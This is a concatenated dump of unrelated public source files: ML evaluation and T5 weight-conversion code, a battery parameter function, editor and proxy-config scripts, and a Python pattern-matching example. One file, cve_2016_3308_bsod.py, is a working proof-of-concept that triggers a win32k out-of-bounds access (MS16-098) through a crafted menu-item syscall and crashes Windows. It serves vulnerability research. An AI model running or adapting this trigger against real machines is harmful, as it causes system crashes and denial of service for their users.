flow_display = Image.fromarray(flow_rgb)
draw = ImageDraw.Draw(flow_display)
draw.ellipse([tuple(target_point_pixel-2), tuple(target_point_pixel+2)], fill='Blue', outline='Blue')
draw.ellipse([tuple(img_waypoint-2), tuple(img_waypoint+2)], fill='Green', outline='Green')
draw.ellipse([tuple(pred_waypoint-2), tuple(pred_waypoint+2)], fill='Red', outline='Red')
flow_display.save(f"log/{args.id}/flow/{str(i)}/{str(batch_num).zfill(4)}.png")
pred_occ_class = torch.argmax(pred_occ[-1], dim=1)
# losses
for k in range(conf.num_class):
gt_occ_k = gt_occ==k
pred_occ_k = pred_occ_class==k
for pt1, pt2 in zip(gt_occ_k, pred_occ_k):
intersection, union = iou(pt1, pt2)
intersection_epoch[k] += float(intersection.item())
union_epoch[k] += float(union.item())
off_epoch += float(F.l1_loss(pred_off[-1], gt_offsets).mean())
wp_epoch += float(F.l1_loss(wp_gt,wp_pred).mean())
out_loss = np.array(intersection_epoch) / np.array(union_epoch)
off_loss = off_epoch / float(batch_num)
wp_loss = wp_epoch / float(batch_num)
print (f'Off: {off_loss:3.3f}')
print (f'Wp: {wp_loss:3.3f}')
print (f'Match: {match}')
print (f'Miss: {miss}')
print (f'FP: {fp}')
for k in range(conf.num_class):
print(f'Class {k:02d}: IoU: {out_loss[k]:3.3f}') |
examples/cve_2016_3308_bsod.py | plowsof/mayhem | 214 | 12691214 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ms16_098_bsod.py
#
# Copyright 2016 <NAME> <<EMAIL>>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""
References:
- http://www.zerodayinitiative.com/advisories/ZDI-16-453/
- http://j00ru.vexillium.org/?p=2105
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms647578(v=vs.85).aspx
Useful breakpoints:
- win32k!NtUserThunkedMenuItemInfo
- win32k!xxxInsertMenuItem
- win32k!xxxInsertMenuItem+0x10c
- win32k!xxxInsertMenuItem+0x188
- win32k!xxxInsertMenuItem+0x195
- win32k!xxxInsertMenuItem+0x1aa ".printf \"rbx = 0x%p, [rsp+0x90] = 0x%p\\n\", rbx, poi(rsp+0x90)"
- win32k!xxxInsertMenuItem+0x2ec
"""
MF_POPUP = 0x0010
MF_STRING = 0x0000
MFS_ENABLED = 0x0000
MFT_STRING = 0x0000
MIIM_BITMAP = 0x0080
MIIM_ID = 0x0002
MIIM_STRING = 0x0040
MIIM_SUBMENU = 0x0004
HBMMENU_SYSTEM = 1
import ctypes
import os
import platform
import random
import sys
import time
lib_path = os.path.split(__file__)[0]
lib_path = os.path.join(lib_path, '..')
lib_path = os.path.abspath(lib_path)
sys.path.insert(0, lib_path)
from mayhem.datatypes.windows import MENUITEMINFOW
from mayhem.datatypes.windows import UNICODE_STRING
from mayhem.exploit.windows import WindowsSyscall
from mayhem.exploit.windows import error_on_null
from mayhem.exploit.windows import print_handle
user32 = ctypes.windll.user32
syscall = WindowsSyscall()
def add_submenu_item(h_menu, name, w_id=None):
h_submenu = user32.CreatePopupMenu()
mi_info = MENUITEMINFOW()
mi_info.cbSize = ctypes.sizeof(MENUITEMINFOW)
mi_info.fMask = MIIM_STRING | MIIM_SUBMENU | MIIM_ID | MIIM_BITMAP
mi_info.fState = MFS_ENABLED
mi_info.hSubMenu = h_submenu
mi_info.wID = random.randint(0x10, 0xff) if w_id is None else w_id
mi_info.dwTypeData = name
mi_info.hbmpItem = HBMMENU_SYSTEM # (required to set nPosition to 1 in trigger)
item = UNICODE_STRING.from_string(name)
result = error_on_null(syscall.NtUserThunkedMenuItemInfo(
h_menu, # HMENU hMenu
0, # UINT nPosition
False, # BOOL fByPosition
True, # BOOL fInsert
ctypes.byref(mi_info), # LPMENUITEMINFOW lpmii
ctypes.byref(item) # PUNICODE_STRING pstrItem
))
print("NtUserThunkedMenuItemInfo submenu result: 0x{0:08x}".format(result))
return h_submenu
def add_menu_item(h_menu, name, w_id=None):
mi_info = MENUITEMINFOW()
mi_info.cbSize = ctypes.sizeof(MENUITEMINFOW)
mi_info.fMask = MIIM_STRING | MIIM_ID
mi_info.fType = MFT_STRING
mi_info.fState = MFS_ENABLED
mi_info.wID = random.randint(0x1000, 0xffff) if w_id is None else w_id
item = UNICODE_STRING.from_string(name)
result = error_on_null(syscall.NtUserThunkedMenuItemInfo(
h_menu, # HMENU hMenu
-1, # UINT nPosition
True, # BOOL fByPosition
True, # BOOL fInsert
ctypes.byref(mi_info), # LPMENUITEMINFOW lpmii
ctypes.byref(item) # PUNICODE_STRING pstrItem
))
print(" mi_info->wID = 0x{0:04x}".format(mi_info.wID))
return result
def trigger(h_menu, name, w_id, n_position, f_by_position):
mi_info = MENUITEMINFOW()
mi_info.cbSize = ctypes.sizeof(MENUITEMINFOW)
mi_info.fMask = MIIM_STRING | MIIM_ID
mi_info.fType = MFT_STRING
mi_info.fState = MFS_ENABLED
mi_info.wID = w_id
item = UNICODE_STRING.from_string(name)
result = error_on_null(syscall.NtUserThunkedMenuItemInfo(
h_menu, # HMENU hMenu
n_position, # UINT nPosition
f_by_position, # BOOL fByPosition
True, # BOOL fInsert
ctypes.byref(mi_info), # LPMENUITEMINFOW lpmii
ctypes.byref(item) # PUNICODE_STRING pstrItem
))
return result
def fill_menu(h_menu, base_idx=0x1000, count=7):
for idx in range(0, count):
print("[*] adding menu item #{0}".format(idx + 1))
time.sleep(0.25)
add_menu_item(h_menu, "menu item {0}".format(idx), w_id=(base_idx + idx))
return
def main():
print('**************************************************')
print('* CVE-2016-3308 / MS16-098 / ZDI-16-453 BSOD *')
print('* win32k!xxxInsertMenuItem Out-of-Bounds Access *')
print('* Spencer (@zeroSteiner) McIntyre *')
print('**************************************************')
if platform.architecture()[0] == '64bit':
print("[*] x86-64 syscall: 0x{0:016x}".format(syscall.address))
else:
print("[*] x86 syscall: 0x{0:08x}".format(syscall.address))
#raw_input("[*] PID: {0}, press enter to continue...".format(os.getpid()))
h_menu = user32.CreateMenu()
print("[*] h_menu: 0x{0:08x}".format(h_menu))
print_handle(h_menu)
h_submenu = add_submenu_item(h_menu, 'submenu', w_id=0x0123)
print("[*] h_submenu: 0x{0:08x}".format(h_submenu))
print_handle(h_submenu)
add_menu_item(h_submenu, 'subsubmenu-item', w_id=0x0001)
fill_menu(h_menu, base_idx=0x1001)
print("[+] triggering...")
time.sleep(0.5)
trigger(h_menu, 'sploit', w_id=0, n_position=0x0123, f_by_position=False)
return 0
main()
|
pybamm/input/parameters/lithium_ion/electrolytes/lipf6_Ramadass2004/electrolyte_diffusivity_Ramadass2004.py | manjunathnilugal/PyBaMM | 330 | 12691236 |
from pybamm import exp, constants
def electrolyte_diffusivity_Ramadass2004(c_e, T):
"""
Diffusivity of LiPF6 in EC:DMC as a function of ion concentration.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. "Development of First Principles Capacity Fade Model for Li-Ion Cells."
(2004)
Parameters
----------
c_e: :class:`pybamm.Symbol`
Dimensional electrolyte concentration
T: :class:`pybamm.Symbol`
Dimensional temperature
Returns
-------
:class:`pybamm.Symbol`
Solid diffusivity
"""
D_c_e = 7.5e-10
E_D_e = 37040
arrhenius = exp(E_D_e / constants.R * (1 / 298.15 - 1 / T))
return D_c_e * arrhenius
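

def _example_evaluation():
    # Editorial sketch (not part of the original parameter file): at the reference
    # temperature T = 298.15 K the Arrhenius factor is exp(0) = 1, so the expression
    # evaluates to the base diffusivity of 7.5e-10 m^2/s for any concentration.
    import pybamm  # assumed importable, since this file ships inside PyBaMM

    D = electrolyte_diffusivity_Ramadass2004(pybamm.Scalar(1000), pybamm.Scalar(298.15))
    return D.evaluate()  # approximately 7.5e-10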
|
build/build.py | babel/6to5-sublime | 3,565 | 12691263 | import sublime
import sublime_plugin
__all__ = ['BuildBabelPackageCommand']
BABEL_CONFIGURATION = {
'name': 'JavaScript (Babel)',
'scope': 'source.js',
'file_extensions': [ 'js', 'jsx', 'es6', 'babel' ],
'flow_types': True,
'jsx': True,
'string_object_keys': True,
'custom_templates': {
'styled_components': True,
},
}
class BuildBabelPackageCommand(sublime_plugin.ApplicationCommand):
def run(self):
from sublime_lib import ResourcePath
from pathlib import Path
from shutil import rmtree
package_path = Path(__file__).parent.parent
syntax_path = ResourcePath.from_file_path(package_path) / 'JavaScript (Babel).sublime-syntax'
test_directory = package_path / 'tests'
rmtree(str(test_directory), ignore_errors=True)
test_directory.mkdir()
print("Building syntax…")
sublime.active_window().run_command('build_js_custom_syntax', {
'name': 'Babel',
'configuration': BABEL_CONFIGURATION,
'destination_path': str(syntax_path.file_path()),
})
ResourcePath('Packages/JSCustom/styled_components/Styled Components.sublime-syntax').copy(
(ResourcePath.from_file_path(package_path) / 'Styled Components.sublime-syntax').file_path()
)
print("Building tests…")
sublime.run_command('build_js_custom_tests', {
'syntax_path': str(syntax_path),
'suites': ['js', 'flow', 'jsx', 'string_object_keys'],
'destination_directory': str(test_directory),
})
print('Done.')
|
src/create_config.py | SamadiPour/iran-hosted-domains | 173 | 12691341 |
import json
from typing import Iterable
import constants as consts
import utils
def shadowrocket(domains: Iterable[str]):
config = (
"#Shadowrocket\n"
"[General]\n"
"bypass-system = true\n"
"skip-proxy = 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, localhost, *.local, captive.apple.com\n"
"tun-excluded-routes = 10.0.0.0/8, 172.16.31.10/10, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 172.16.31.10/24, 192.168.0.0/16, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 172.16.17.32/4, 255.255.255.255/32\n"
"dns-server = system\n"
"ipv6 = true\n"
"[Rule]\n"
)
config += "".join(f"DOMAIN-SUFFIX,{domain},DIRECT\n" for domain in domains)
config += (
"USER-AGENT,Line*,PROXY\n"
"IP-CIDR,192.168.0.0/16,DIRECT\n"
"IP-CIDR,10.0.0.0/8,DIRECT\n"
"IP-CIDR,172.16.0.0/12,DIRECT\n"
"IP-CIDR,127.0.0.0/8,DIRECT\n"
"GEOIP,IR,DIRECT\n"
"FINAL,PROXY\n"
"[Host]\n"
"localhost = 127.0.0.1\n"
)
utils.save_to_file(consts.shadowrocket_path, config)
def qv2ray(direct_domains: Iterable[str], proxied_domains: Iterable[str], ads_domains: Iterable[str]):
schema = {
"description": "Iran hosted domains",
"domainStrategy": "AsIs",
"domains": {
"direct": ["regexp:^.+\\.ir$"] + list(direct_domains),
"proxy": list(proxied_domains),
"block": ["geosite:category-ads-all"] + list(ads_domains),
},
"ips": {"direct": ["geoip:ir"]},
"name": "ir_hosted",
}
utils.save_to_file(consts.qv2ray_schema_path, json.dumps(schema))
def clash(domains: Iterable[str]):
config = (
"# Clash\n"
"# Wiki: https://github.com/Dreamacro/clash/wiki/premium-core-features#rule-providers\n"
"payload:\n"
)
config += "".join(f" - DOMAIN-SUFFIX,{domain}\n" for domain in domains)
config += (
# " - IP-CIDR,192.168.0.0/16\n"
# " - IP-CIDR,10.0.0.0/8\n"
# " - IP-CIDR,172.16.0.0/12\n"
# " - IP-CIDR,127.0.0.0/8\n"
" - GEOIP,IR\n"
)
utils.save_to_file(consts.clash_path, config)
def switchy_omega(others: Iterable[str]):
config = "127.0.0.1\n" "::1\n" "localhost\n" "*.ir\n"
config += "".join(f"*{domain}\n" for domain in others)
utils.save_to_file(consts.switchy_omega_path, config)
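# Editor's illustrative driver (kept as a comment; the real domain lists are
# loaded elsewhere in the repository). The domains below are hypothetical
# placeholders, shown only to demonstrate how the generators are called:
#
#     domains = ["example1.com", "example2.com"]
#     shadowrocket(domains)
#     clash(domains)
#     qv2ray(domains, proxied_domains=[], ads_domains=[])
#     switchy_omega(domains)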
|
odin/utilities/__init__.py | gsamarakoon/Odin | 103 | 12691343 | from .odin_init import odin_init
from .compute_days_elapsed import compute_days_elapsed
from .fund_actions import period_dict
|
03-dict-set/py3.10/creator.py | SeirousLee/example-code-2e | 990 | 12691354 | """
Pattern matching with mapping—requires Python ≥ 3.10
# tag::DICT_MATCH_TEST[]
>>> b1 = dict(api=1, author='<NAME>',
... type='book', title='Gödel, Escher, Bach')
>>> get_creators(b1)
['<NAME>']
>>> from collections import OrderedDict
>>> b2 = OrderedDict(api=2, type='book',
... title='Python in a Nutshell',
... authors='<NAME>'.split())
>>> get_creators(b2)
['Martelli', 'Ravenscroft', 'Holden']
>>> get_creators({'type': 'book', 'pages': 770})
Traceback (most recent call last):
...
ValueError: Invalid 'book' record: {'type': 'book', 'pages': 770}
>>> get_creators('Spam, spam, spam')
Traceback (most recent call last):
...
ValueError: Invalid record: 'Spam, spam, spam'
# end::DICT_MATCH_TEST[]
"""
# tag::DICT_MATCH[]
def get_creators(record: dict) -> list:
match record:
case {'type': 'book', 'api': 2, 'authors': [*names]}: # <1>
return names
case {'type': 'book', 'api': 1, 'author': name}: # <2>
return [name]
case {'type': 'book'}: # <3>
raise ValueError(f"Invalid 'book' record: {record!r}")
case {'type': 'movie', 'director': name}: # <4>
return [name]
case _: # <5>
raise ValueError(f'Invalid record: {record!r}')
# end::DICT_MATCH[]
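# Editor's addition (not in the original Fluent Python example): a minimal
# driver that runs the doctests embedded in the module docstring above.
if __name__ == '__main__':
    import doctest
    doctest.testmod()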
|
src/tf_transformers/models/t5/convert.py | legacyai/tf-transformers | 116 | 12691367 | import numpy as np
import tensorflow as tf
from absl import logging
from tf_transformers.core import keras_utils
def convert_t5_pt(model, config, model_name):
"""PT converter
Args:
        model: tf_transformers model/layer
        config: dict
        model_name: name of the pretrained HuggingFace checkpoint to load weights from
    Returns:
        None. The weights of ``model`` are assigned in place.
"""
    # When dropout or use_auto_regressive is enabled, the output assertions won't hold
SKIP_ASSERT = False
try:
# LegacyLayer
local_config = model._config_dict['decoder']
except Exception as e:
# LegacyModel
local_config = model.model_config['decoder']
if local_config['use_dropout']:
logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
SKIP_ASSERT = True
if local_config['use_auto_regressive']:
raise ValueError(
"Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
)
SKIP_ASSERT = True
import torch
import transformers
transformers.logging.set_verbosity_error()
from_model_vars = [
"encoder.block.{}.layer.0.SelfAttention.q.weight",
"encoder.block.{}.layer.0.SelfAttention.k.weight",
"encoder.block.{}.layer.0.SelfAttention.v.weight",
"encoder.block.{}.layer.0.SelfAttention.o.weight",
"encoder.block.{}.layer.0.layer_norm.weight",
"encoder.block.{}.layer.1.DenseReluDense.wi.weight",
"encoder.block.{}.layer.1.DenseReluDense.wo.weight",
"encoder.block.{}.layer.1.layer_norm.weight",
]
to_model_vars = [
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_encoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"encoder.block.0.layer.0.SelfAttention.relative_attention_bias.weight"
] = "tf_transformers/t5_encoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
# Word Embedding
mapping_dict["shared.weight"] = "tf_transformers/t5_encoder/word_embeddings/embeddings:0"
# Final Layer Norm weight
mapping_dict["encoder.final_layer_norm.weight"] = "tf_transformers/t5_encoder/last_layer_norm/weight:0"
# T5Model
from transformers import T5Model as PTT5Model
model_hf = PTT5Model.from_pretrained(model_name)
# HF model variable name to variable values, for fast retrieval
from_to_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters()}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
np.reshape(
np.transpose(from_to_variable_dict.get(original_var)),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
elif "kernel:0" in legacy_var:
if list(model.variables[index].shape) == list(from_to_variable_dict.get(original_var).shape):
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
else:
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
# Decoder Side
# From vars (Transformer variables)
from_model_vars = [
"decoder.block.{}.layer.0.SelfAttention.q.weight",
"decoder.block.{}.layer.0.SelfAttention.k.weight",
"decoder.block.{}.layer.0.SelfAttention.v.weight",
"decoder.block.{}.layer.0.SelfAttention.o.weight",
"decoder.block.{}.layer.0.layer_norm.weight",
"decoder.block.{}.layer.1.EncDecAttention.q.weight",
"decoder.block.{}.layer.1.EncDecAttention.k.weight",
"decoder.block.{}.layer.1.EncDecAttention.v.weight",
"decoder.block.{}.layer.1.EncDecAttention.o.weight",
"decoder.block.{}.layer.1.layer_norm.weight",
"decoder.block.{}.layer.2.DenseReluDense.wi.weight",
"decoder.block.{}.layer.2.DenseReluDense.wo.weight",
"decoder.block.{}.layer.2.layer_norm.weight",
]
to_model_vars = [
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_cross_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"decoder.block.0.layer.0.SelfAttention.relative_attention_bias.weight"
] = "tf_transformers/t5_decoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
# Final Layer Norm weight
mapping_dict["decoder.final_layer_norm.weight"] = "tf_transformers/t5_decoder/last_layer_norm/weight:0"
# HF model variable name to variable values, for fast retrieval
from_to_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters()}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
if (
var.name
== "tf_transformers/t5_decoder/transformer/layer_0/cross_attention/relative_attention_bias/embeddings:0"
):
model.variables[index].assign(tf.zeros_like(model.variables[index]))
continue
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
np.reshape(
np.transpose(from_to_variable_dict.get(original_var)),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
elif "kernel:0" in legacy_var:
if list(model.variables[index].shape) == list(from_to_variable_dict.get(original_var).shape):
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
else:
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
if SKIP_ASSERT is False:
from transformers import T5Tokenizer
tokenizer = T5Tokenizer.from_pretrained(model_name)
text = "This is a long sentence to check how close models are."
inputs = tokenizer(text, return_tensors="pt")
outputs_hf = model_hf(inputs["input_ids"], decoder_input_ids=inputs["input_ids"])
outputs_hf = torch.sum(outputs_hf["last_hidden_state"], dim=-1).detach().numpy()
inputs = tokenizer(text, return_tensors="tf")
inputs_tf = {}
inputs_tf["encoder_input_ids"] = inputs["input_ids"]
inputs_tf["encoder_input_mask"] = inputs["attention_mask"]
inputs_tf["decoder_input_ids"] = inputs["input_ids"]
outputs_tf = model(inputs_tf)
outputs_tf = tf.reduce_sum(outputs_tf["token_embeddings"], axis=-1).numpy()
tf.debugging.assert_near(outputs_hf, outputs_tf, rtol=1.0)
def convert_t5_tf(model, config, model_name):
"""TF converter
Args:
        model: tf_transformers model/layer
        config: dict
        model_name: name of the pretrained HuggingFace checkpoint to load weights from
    Returns:
        None. The weights of ``model`` are assigned in place.
"""
    # When dropout or use_auto_regressive is enabled, the output assertions won't hold
SKIP_ASSERT = False
try:
# LegacyLayer
local_config = model._config_dict['decoder']
except Exception as e:
# LegacyModel
local_config = model.model_config['decoder']
if local_config['use_dropout']:
logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
SKIP_ASSERT = True
if local_config['use_auto_regressive']:
raise ValueError(
"Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
)
SKIP_ASSERT = True
import transformers
transformers.logging.set_verbosity_error()
from_model_vars = [
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/q/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/k/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/v/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/SelfAttention/o/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._0/layer_norm/weight:0",
"tf_t5model/encoder/block_._{}/layer_._1/DenseReluDense/wi/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._1/DenseReluDense/wo/kernel:0",
"tf_t5model/encoder/block_._{}/layer_._1/layer_norm/weight:0",
]
to_model_vars = [
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_encoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_encoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"tf_t5model/encoder/block_._0/layer_._0/SelfAttention/relative_attention_bias/embeddings:0"
] = "tf_transformers/t5_encoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
# Word Embedding
mapping_dict["shared/shared/weight:0"] = "tf_transformers/t5_encoder/word_embeddings/embeddings:0"
# Final Layer Norm weight
mapping_dict["tf_t5model/encoder/final_layer_norm/weight:0"] = "tf_transformers/t5_encoder/last_layer_norm/weight:0"
# T5Model
from transformers import TFT5Model
model_hf = TFT5Model.from_pretrained(model_name)
from_to_variable_dict = {var.name: var for var in model_hf.variables}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
tf.reshape(
from_to_variable_dict.get(original_var),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
# Decoder Side
# From vars (Transformer variables)
from_model_vars = [
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/q/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/k/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/v/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/SelfAttention/o/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._0/layer_norm/weight:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/q/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/k/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/v/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/EncDecAttention/o/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._1/layer_norm/weight:0",
"tf_t5model/decoder/block_._{}/layer_._2/DenseReluDense/wi/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._2/DenseReluDense/wo/kernel:0",
"tf_t5model/decoder/block_._{}/layer_._2/layer_norm/weight:0",
]
to_model_vars = [
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/query/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/key/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention/value/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/cross_attention_output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/pre_cross_attention_norm/weight:0",
"tf_transformers/t5_decoder/transformer/layer_{}/intermediate/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/output/kernel:0",
"tf_transformers/t5_decoder/transformer/layer_{}/self_attention_layer_norm/weight:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# Only Layer 0
mapping_dict[
"tf_t5model/decoder/block_._0/layer_._0/SelfAttention/relative_attention_bias/embeddings:0"
] = "tf_transformers/t5_decoder/transformer/layer_0/self_attention/relative_attention_bias/embeddings:0"
mapping_dict[
"tf_t5model/decoder/block_._0/layer_._1/EncDecAttention/relative_attention_bias/embeddings:0"
] = "tf_transformers/t5_decoder/transformer/layer_0/cross_attention/relative_attention_bias/embeddings:0"
# Final Layer Norm weight
mapping_dict["tf_t5model/decoder/final_layer_norm/weight:0"] = "tf_transformers/t5_decoder/last_layer_norm/weight:0"
from_to_variable_dict = {var.name: var for var in model_hf.variables}
tf_transformers_model_index_dict = {}
